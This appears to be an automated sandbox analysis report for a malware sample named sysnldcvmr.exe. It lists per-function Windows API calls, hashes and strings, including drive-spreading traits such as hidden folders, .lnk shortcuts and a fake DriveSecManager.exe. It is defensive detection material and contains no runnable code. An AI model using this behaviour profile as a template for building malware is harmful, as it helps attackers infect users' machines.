Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
String ID: TCP$UDP
API String ID: 1519345861-1097902612
Opcode ID: e7e0460ef37b7f5a634b859c329effc3c57a24fdb8b35e9f857aa09b9315b4ce
Instruction ID: b9d850b43d5b9198a526a111fa4c70c7537d99c61ef063864e94ee7d89292dcb
Opcode Fuzzy Hash: e7e0460ef37b7f5a634b859c329effc3c57a24fdb8b35e9f857aa09b9315b4ce
Instruction Fuzzy Hash: A91181B4D01208EBDB00EBD4D945FEE7374AB44308F1089BAE505772C2D7799E58CB9A

Function 0040CAD0 Relevance: 4.6, APIs: 3, Instructions: 120COMMON

Download Yara Rule

APIs

InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040CADC
InterlockedIncrement.KERNEL32(000000FF), ref: 0040CB11
InterlockedDecrement.KERNEL32(000000FF), ref: 0040CC14

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Interlocked$DecrementExchangeIncrement
String ID:
API String ID: 2813130747-0
Opcode ID: 583b2f640be86316a3766e4c7421dc12573213a2e397918099c48a18d3c3b376
Instruction ID: 83670a342839083162ad58e3b7d5d9bbd8ac0fe46ad26882e5e5984df89c7db9
Opcode Fuzzy Hash: 583b2f640be86316a3766e4c7421dc12573213a2e397918099c48a18d3c3b376
Instruction Fuzzy Hash: EB41C5B5E00204FBDF00EB94E885BAF77755B04304F148669F505BB2C2D639E94187A9

Function 0040B480 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(Twizt,0040D5B8,0040D5B8,?,?,0040D5B8,00000000,0040D5B8,0040D5B8,00000000,00000000), ref: 0040B4CC

Strings

Twizt, xrefs: 0040B4C7
Twizt, xrefs: 0040B4D3

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: lstrlen
String ID: Twizt$Twizt
API String ID: 1659193697-16428492
Opcode ID: 28cc8b85fbb863a96b5461235214a5ab15b9d829432cc0cf808d74acbef9bc59
Instruction ID: a71c0bccabe8f3fb080a23dd90b4eb14de59e01fcd2b7b8bcad4b0800539831b
Opcode Fuzzy Hash: 28cc8b85fbb863a96b5461235214a5ab15b9d829432cc0cf808d74acbef9bc59
Instruction Fuzzy Hash: 181124B5900108BFCB04DF98D841E9EB7B5EF48308F14C1A9FD19AB342D635EA10CBA5

Function 0040CDC0 Relevance: 4.5, APIs: 3, Instructions: 45networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000001,00000006), ref: 0040CDD3
htons.WS2_32(00009E34), ref: 0040CE05
connect.WS2_32(000000FF,?,00000010), ref: 0040CE1F

Part of subcall function 0040AB40: shutdown.WS2_32(0040AB2D,00000002), ref: 0040AB49
Part of subcall function 0040AB40: closesocket.WS2_32(0040AB2D), ref: 0040AB53

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: closesocketconnecthtonsshutdownsocket
String ID:
API String ID: 1987800339-0
Opcode ID: cbdb9185097dfb3a9a33e6ecced3d904d4b18b7e3af7f03057a5aabe6a457024
Instruction ID: 10e4ce005d5f4377fb43720ce7fadd865a0fdbaf8ef4bbe44a4c7335c1314f5f
Opcode Fuzzy Hash: cbdb9185097dfb3a9a33e6ecced3d904d4b18b7e3af7f03057a5aabe6a457024
Instruction Fuzzy Hash: 71113974D05209EBCB10DFA8DA496AEB670AF08320F2043A9E529A73D0D7745F01979A

Function 00409E70 Relevance: 4.5, APIs: 3, Instructions: 34memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00409E50: GetCurrentProcessId.KERNEL32(?,00409DBB,?,0040C6CE,00000010,?,?,?,?,?,?,0040C43B), ref: 00409E53

HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,00409DC7,?,0040C6CE,00000010,?,?,?,?,?,?,0040C43B), ref: 00409E9C
HeapSetInformation.KERNEL32(009D0000,00000000,00000002,00000004), ref: 00409EC6
GetCurrentProcessId.KERNEL32 ref: 00409ECC

Part of subcall function 00409EE0: GetProcessHeaps.KERNEL32(000000FF,?), ref: 00409EFC

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Process$CurrentHeap$CreateHeapsInformation
String ID:
API String ID: 3179415709-0
Opcode ID: f2378abd389c528855b2215640a50ba70f6bde38e81fbf66e01ddb41fd263172
Instruction ID: d15e15a0956cd53a3f7420caceedbd75f27766a05eec27fee61015ba2f128238
Opcode Fuzzy Hash: f2378abd389c528855b2215640a50ba70f6bde38e81fbf66e01ddb41fd263172
Instruction Fuzzy Hash: D1F0B4B0581304ABD724DB71FC05BA637A8A704705F02803EF6089A2D2EAB9DC44CB9C

Function 00409DB0 Relevance: 3.1, APIs: 2, Instructions: 52memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00409E50: GetCurrentProcessId.KERNEL32(?,00409DBB,?,0040C6CE,00000010,?,?,?,?,?,?,0040C43B), ref: 00409E53

RtlAllocateHeap.NTDLL(009D0000,?,-0000000C), ref: 00409DFA
memset.NTDLL ref: 00409E34

Part of subcall function 00409E70: HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,00409DC7,?,0040C6CE,00000010,?,?,?,?,?,?,0040C43B), ref: 00409E9C
Part of subcall function 00409E70: HeapSetInformation.KERNEL32(009D0000,00000000,00000002,00000004), ref: 00409EC6
Part of subcall function 00409E70: GetCurrentProcessId.KERNEL32 ref: 00409ECC

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Heap$CurrentProcess$AllocateCreateInformationmemset
String ID:
API String ID: 3494217179-0
Opcode ID: d8037d4416afb632a3dc4f98f72e54e87fb15f54c14e696db28e718d2a8b7ec8
Instruction ID: bc348cf5c9b079020b3d900c37522172a8fbba108f4db171397f18f444666f8c
Opcode Fuzzy Hash: d8037d4416afb632a3dc4f98f72e54e87fb15f54c14e696db28e718d2a8b7ec8
Instruction Fuzzy Hash: A611FEB5900108BBCB10EFA5D845B9E7BB5AF44305F14C169F909BB382D638DE54CB99

Function 0040D550 Relevance: 3.0, APIs: 2, Instructions: 49synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004013B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040D55D,00000000), ref: 004013D5
Part of subcall function 004013B0: socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
Part of subcall function 004013B0: bind.WS2_32(?,?,00000010), ref: 00401429

Part of subcall function 0040B200: EnterCriticalSection.KERNEL32(00416690), ref: 0040B210
Part of subcall function 0040B200: LeaveCriticalSection.KERNEL32(00416690), ref: 0040B23C

InterlockedExchangeAdd.KERNEL32(00000000,00000000), ref: 0040D57D
WaitForSingleObject.KERNEL32(000005D4,00001388), ref: 0040D5C7

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CriticalSection$CreateEnterEventExchangeInterlockedLeaveObjectSingleWaitbindsocket
String ID:
API String ID: 3920643007-0
Opcode ID: a86012ae710333058172dcdbedf12253eac4732d168f1a6e5cd698471d501b85
Instruction ID: ebe6697be7004dc57312df383308c6bc29ac17b58d9e4cbca4aa496e4513f42a
Opcode Fuzzy Hash: a86012ae710333058172dcdbedf12253eac4732d168f1a6e5cd698471d501b85
Instruction Fuzzy Hash: 1F11A575E00208BBE704EBE4DC4ABAF7734AB04704F148179F901772D1E6B5AA44CB89

Function 0040ADD0 Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON

Download Yara Rule

APIs

gethostname.WS2_32(?,00000100), ref: 0040ADEC
gethostbyname.WS2_32(?), ref: 0040ADFE

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: gethostbynamegethostname
String ID:
API String ID: 3961807697-0
Opcode ID: 3e0d64d0359f05fd9a79bfd049c8ca7c81df9b12e882189b7266d53aab3380c0
Instruction ID: 4c25e3467811ff68b39612d5822c2a685709a2e0bc46d2761966ab013cae1a79
Opcode Fuzzy Hash: 3e0d64d0359f05fd9a79bfd049c8ca7c81df9b12e882189b7266d53aab3380c0
Instruction Fuzzy Hash: 4E1112349442288BCB24CF24C848BD9B771AB65314F1886D6D4C9673D0C7F96DD5CF86

Function 0040AA40 Relevance: 3.0, APIs: 2, Instructions: 24networkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32(0040AAC1), ref: 0040AA4A
gethostbyname.WS2_32(?), ref: 0040AA5D

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: gethostbynameinet_addr
String ID:
API String ID: 1594361348-0
Opcode ID: 46542f40318f5cfb28b81fc8c4f0329da453caff3e113274fd4b0c2f7b1fac6b
Instruction ID: cb50bac6aa0e7e12dc0343020e8a378ceee1aa6c6dd57b9abb221f5468a140c1
Opcode Fuzzy Hash: 46542f40318f5cfb28b81fc8c4f0329da453caff3e113274fd4b0c2f7b1fac6b
Instruction Fuzzy Hash: D9F0A274900208EFCB14DFE4D54899EBBB4EB49311F1083A6D905573A0D7749E90DF45

Function 0040B420 Relevance: 3.0, APIs: 2, Instructions: 16synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(000005D4,000003E8), ref: 0040B42E
InterlockedDecrement.KERNEL32(00415260), ref: 0040B440

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: DecrementInterlockedObjectSingleWait
String ID:
API String ID: 4086267124-0
Opcode ID: 040714827fe75f1fa5521dd8f7f71bf1496fed6b52bc5ae53ab0c45206f60a91
Instruction ID: 19902dc294b38e57afb5a04d7a561a5dae5f2b0dcbf69620d3c261a402e6fa36
Opcode Fuzzy Hash: 040714827fe75f1fa5521dd8f7f71bf1496fed6b52bc5ae53ab0c45206f60a91
Instruction Fuzzy Hash: FFD0A73164430857C6006BA1EC4ABAA3A2FE710700B50C037F305F11C2CBBCD990979E

Function 0040AB40 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

shutdown.WS2_32(0040AB2D,00000002), ref: 0040AB49
closesocket.WS2_32(0040AB2D), ref: 0040AB53

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: closesocketshutdown
String ID:
API String ID: 572888783-0
Opcode ID: 25f7de04c8b00f8f37ac4a6d3bc42f69888779e154306af29f6f284285fde8ae
Instruction ID: e588004495cc6a7b8ebd8d82ef2c96d96882889d66b7c68133776882e6b5d849
Opcode Fuzzy Hash: 25f7de04c8b00f8f37ac4a6d3bc42f69888779e154306af29f6f284285fde8ae
Instruction Fuzzy Hash: 39C04C7914020CBBCB549FE5EC4DDD97BACFB48751F108455FA098B251CAB6E9808B94

Function 0040B200 Relevance: 2.5, APIs: 2, Instructions: 20COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00416690), ref: 0040B210
LeaveCriticalSection.KERNEL32(00416690), ref: 0040B23C

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 839316003de6d4969e72e9a64bdcbbbec430ca9f73e83315ba2c9423ae0d711a
Instruction ID: 4173032fab3eb0730c98540359f75f4152e7c09aa21c3b13d5d70a64086a5cd8
Opcode Fuzzy Hash: 839316003de6d4969e72e9a64bdcbbbec430ca9f73e83315ba2c9423ae0d711a
Instruction Fuzzy Hash: F4E01AB4941208EFCB14DF84FC09BD97B68E704305F12806DE90853390D7B5AE90DA9D

Function 0040AB60 Relevance: 2.5, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00416690,?,0040B3F7), ref: 0040AB68
LeaveCriticalSection.KERNEL32(00416690,?,0040B3F7), ref: 0040AB78

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 81c3f962b9ec76ce2805c60adb74695caac985be6cbd1f024fba086166782042
Instruction ID: 927706f0d4a3faa36ccdeaf6698e9d1267a6522d247c521c6b95ccff81df7cb1
Opcode Fuzzy Hash: 81c3f962b9ec76ce2805c60adb74695caac985be6cbd1f024fba086166782042
Instruction Fuzzy Hash: 09B09B341C03059B81103F95BC0BBCC3F1895047653128036FD0954051DDE5B4D4D95F

Function 0040A1B0 Relevance: 1.5, APIs: 1, Instructions: 35memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00409E50: GetCurrentProcessId.KERNEL32(?,00409DBB,?,0040C6CE,00000010,?,?,?,?,?,?,0040C43B), ref: 00409E53

RtlFreeHeap.NTDLL(009D0000,00000000,00402612,?,00402612,?), ref: 0040A20B

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CurrentFreeHeapProcess
String ID:
API String ID: 3855406826-0
Opcode ID: 5c77f0e4d4085861ac8a8ab167670b2290c4d540b64ade23244c922168c35f16
Instruction ID: 3faa604e5be9d5a0263373ae2e3f7e010bf72a20a2b1d8f85abd2c6c7d5d41cb
Opcode Fuzzy Hash: 5c77f0e4d4085861ac8a8ab167670b2290c4d540b64ade23244c922168c35f16
Instruction Fuzzy Hash: 11F06874900308AFDB04DFD5D8449ADBB75AF94304F10C1AEEA086B381FA36DD51CB95

Function 0040CC90 Relevance: 1.5, APIs: 1, Instructions: 32networkCOMMON

Download Yara Rule

APIs

send.WS2_32(00000000,00000000,?,00000000), ref: 0040CCAF

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 06370eea5684355e58e3ecca2704a58af4611f1d3e16c80e6b4b5217ad5f95b8
Instruction ID: 45736cdf7257a26a41736574bf54bf9ad9d0bdd3ada43f241fa33aa1b29d5f37
Opcode Fuzzy Hash: 06370eea5684355e58e3ecca2704a58af4611f1d3e16c80e6b4b5217ad5f95b8
Instruction Fuzzy Hash: E201317490834DEFDB00CFA8C884BDD7BB4BB08314F148299E819A7381D3759695DB55

Function 0040CEB0 Relevance: 1.5, APIs: 1, Instructions: 25synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0040B200: EnterCriticalSection.KERNEL32(00416690), ref: 0040B210
Part of subcall function 0040B200: LeaveCriticalSection.KERNEL32(00416690), ref: 0040B23C

WaitForSingleObject.KERNEL32(000005D4,00001388), ref: 0040CEDC

Part of subcall function 0040CAD0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040CADC

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CriticalSection$EnterExchangeInterlockedLeaveObjectSingleWait
String ID:
API String ID: 3309573332-0
Opcode ID: 12ca459a1005339a85f2975bee04b4d743ea4df3d22cee4e9c3de1405843334b
Instruction ID: 44ae0f0a1ed3c9862aadb4204bdd5a5f8f47b864d141f75822239993b39a6931
Opcode Fuzzy Hash: 12ca459a1005339a85f2975bee04b4d743ea4df3d22cee4e9c3de1405843334b
Instruction Fuzzy Hash: 91E0927094030CE6D714E7A1D846B6F722AA710305F14427EF501762C2DA7A9E40D7DC

Function 004072C0 Relevance: 1.5, APIs: 1, Instructions: 23comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 004072E0

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 34e119f03330a37951e29d4ee19d5d58663b392051cfe4a9acefb3e3966ee614
Instruction ID: 4030d214640323180f81309a45cda4b6a66b11fae01bbf3bc15f759713f42cbd
Opcode Fuzzy Hash: 34e119f03330a37951e29d4ee19d5d58663b392051cfe4a9acefb3e3966ee614
Instruction Fuzzy Hash: 07E0ED74D0020CFFDF00DF94C889BDEBBB8AB04315F1081A9F90467280D7B56A94DB95

Function 004062C0 Relevance: 1.3, APIs: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406320: GetDriveTypeW.KERNEL32(004062FF), ref: 0040632D

lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406313

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: DriveTypelstrcpy
String ID:
API String ID: 3664088370-0
Opcode ID: 2d61ef023cbf4c1c2148b72ea45ffb06c686e76863e737ed56d1566052f9a4a4
Instruction ID: 8c00fedf36f089a4a79421f594ce94f1f5e858f4e01688578a9b7e0a2acaca41
Opcode Fuzzy Hash: 2d61ef023cbf4c1c2148b72ea45ffb06c686e76863e737ed56d1566052f9a4a4
Instruction Fuzzy Hash: 96F01D75900208FBDB04DFA4D4557DEB7B4EF44304F14C5A9E819AB280E679AB58CB89

Non-executed Functions

Function 004066B0 Relevance: 80.8, APIs: 35, Strings: 11, Instructions: 305fileCOMMON

Download Yara Rule

APIs

_chkstk.NTDLL(?,00406D30,?,?,?), ref: 004066B8
wsprintfW.USER32 ref: 004066EF
wsprintfW.USER32 ref: 0040670F
wsprintfW.USER32 ref: 0040672F
wsprintfW.USER32 ref: 0040674F
wsprintfW.USER32 ref: 00406768
PathFileExistsW.SHLWAPI(?), ref: 00406778
SetFileAttributesW.KERNEL32(?,00000080), ref: 004067B1
DeleteFileW.KERNEL32(?), ref: 004067BE
PathFileExistsW.SHLWAPI(?), ref: 004067CB
PathFileExistsW.SHLWAPI(?), ref: 004067E0
SetFileAttributesW.KERNEL32(?,00000080), ref: 004067F6
DeleteFileW.KERNEL32(?), ref: 00406803
PathFileExistsW.SHLWAPI(?), ref: 00406810
CreateDirectoryW.KERNEL32(?,00000000), ref: 00406823
SetFileAttributesW.KERNEL32(?,00000002), ref: 00406836
PathFileExistsW.SHLWAPI(?), ref: 00406843

Strings

shell32.dll, xrefs: 004068A7
%s\*, xrefs: 0040675C
%s\%s, xrefs: 00406AA2
%s\%s\DriveSecManager.exe, xrefs: 00406723
%s\%s, xrefs: 00406743
shell32.dll, xrefs: 0040688F
%s\%s, xrefs: 00406703
C:\Windows\sysnldcvmr.exe, xrefs: 00406856
%s\%s\%s, xrefs: 00406B3C
%s\%s, xrefs: 00406B15
%s.lnk, xrefs: 004066E3

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: File$ExistsPathwsprintf$Attributes$Delete$CreateDirectory_chkstk
String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\DriveSecManager.exe$%s\*$C:\Windows\sysnldcvmr.exe$shell32.dll$shell32.dll
API String ID: 2467965697-1186605320
Opcode ID: 6fdb608ebf9e3f7754ee061c031def056059c2a3e2aafc618c301169eaa81d58
Instruction ID: f76dd7f444767b2c43f85b167d980272eeebb95a9fd79305f50fc2a4155965b0
Opcode Fuzzy Hash: 6fdb608ebf9e3f7754ee061c031def056059c2a3e2aafc618c301169eaa81d58
Instruction Fuzzy Hash: BFD162B5900258ABCB20DF50DC44BEA77B8BB48304F0485EAF60AE6191D7B99BD4CF59

Function 00406570 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 85filestringCOMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(ok@,00000000), ref: 0040657F
